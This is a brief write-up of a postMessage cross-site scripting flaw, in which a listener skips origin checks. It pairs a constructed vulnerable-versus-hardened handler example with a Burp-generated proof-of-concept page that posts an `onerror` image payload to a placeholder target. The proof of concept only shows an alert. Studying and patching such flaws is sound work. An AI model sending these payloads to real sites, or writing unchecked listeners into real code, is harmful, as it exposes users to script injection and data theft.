Post Message Xss

specifically in the event listener for postMessage requests that does not check the origin before using the received data. As a result, an attacker can exploit this vulnerability by sending malicious data to your application from a null origin (for example, a sandboxed iframe) while pretending that it came from a trusted source. This can lead to a number of security risks, such as data theft or other malicious activity.
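
The listener-side view of the issue described above, as an added example that is not part of the original page or of any particular application: the vulnerable pattern (no origin check, data written as HTML) beside the hardened one (exact-match allowlist, the string "null" origin rejected, data written as text). The ALLOWED_ORIGINS value, the handler names and the message objects are constructed assumptions; the sink object is a stand-in for a DOM element so the code runs under Node.

```javascript
// Allowlist of origins this page is willing to receive messages from.
// Constructed placeholder value; a real app lists its own exact origins.
const ALLOWED_ORIGINS = ['https://app.example'];

// Vulnerable pattern: trusts event.data regardless of event.origin and
// hands it to an HTML-parsing sink. Any window that can obtain a reference
// to this one (opener, embedder, sandboxed iframe) can inject markup.
function vulnerableHandler(event, sink) {
  sink.innerHTML = event.data; // no origin check, HTML sink
  return true;                 // message was accepted
}

// Hardened pattern: exact string comparison against the allowlist.
// A sandboxed iframe or other opaque origin reports event.origin as the
// string "null", which never matches an https:// entry, so it is dropped.
// Avoid startsWith/indexOf checks: they let lookalike origins through.
function hardenedHandler(event, sink) {
  if (!ALLOWED_ORIGINS.includes(event.origin)) {
    return false;              // unknown or "null" origin: drop silently
  }
  if (typeof event.data !== 'string') {
    return false;              // only the message shape we expect
  }
  sink.textContent = event.data; // text sink: markup is not parsed
  return true;
}

// Minimal stand-in for a DOM element (constructed, not a real element).
function makeSink() {
  return { innerHTML: '', textContent: '' };
}

// Constructed MessageEvent-shaped objects for the three cases that matter.
const fromSandbox  = { origin: 'null', data: "<img src=x onerror=alert('pwnwed')>" };
const fromLookalike = { origin: 'https://app.example.attacker.test', data: 'hello' };
const fromTrusted  = { origin: 'https://app.example', data: '<b>hi</b>' };

// Run all three through both handlers and report what each one accepted.
function demo() {
  const results = {};
  for (const [name, ev] of Object.entries({ fromSandbox, fromLookalike, fromTrusted })) {
    const v = makeSink(), h = makeSink();
    results[name] = {
      vulnerable: vulnerableHandler(ev, v), vulnerableHtml: v.innerHTML,
      hardened: hardenedHandler(ev, h), hardenedText: h.textContent, hardenedHtml: h.innerHTML,
    };
  }
  return results;
}
```

In a real page the hardened function is what you pass to `window.addEventListener('message', ...)`; the demo only exercises it with constructed events.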

Proof of Concept (PoC)

<!doctype html>
<html>
    <head>
        <!-- DOM XSS PoC - generated by DOM Invader part of Burp Suite -->
        <meta charset="UTF-8" />
        <title>Postmessage PoC</title>
        <script>
            <!-- Opens the target in a new window and posts the payload to it. -->
            function pocLink() {
                var ref = window.open('https://url');
                ref.postMessage("<img src=x onerror=alert('pwnwed')>", "https://url");
            }
            <!-- Same payload, posted to the embedded iframe once it has loaded. -->
            function pocFrame(win) {
                win.postMessage("<img src=x onerror=alert('pwnwed')>", "https://url");
            }
        </script>
    </head>
    <body>
        <a href="#" onclick="pocLink();">PoC link</a>
        <iframe src="https://url" onload="pocFrame(this.contentWindow)"></iframe>
    </body>
</html>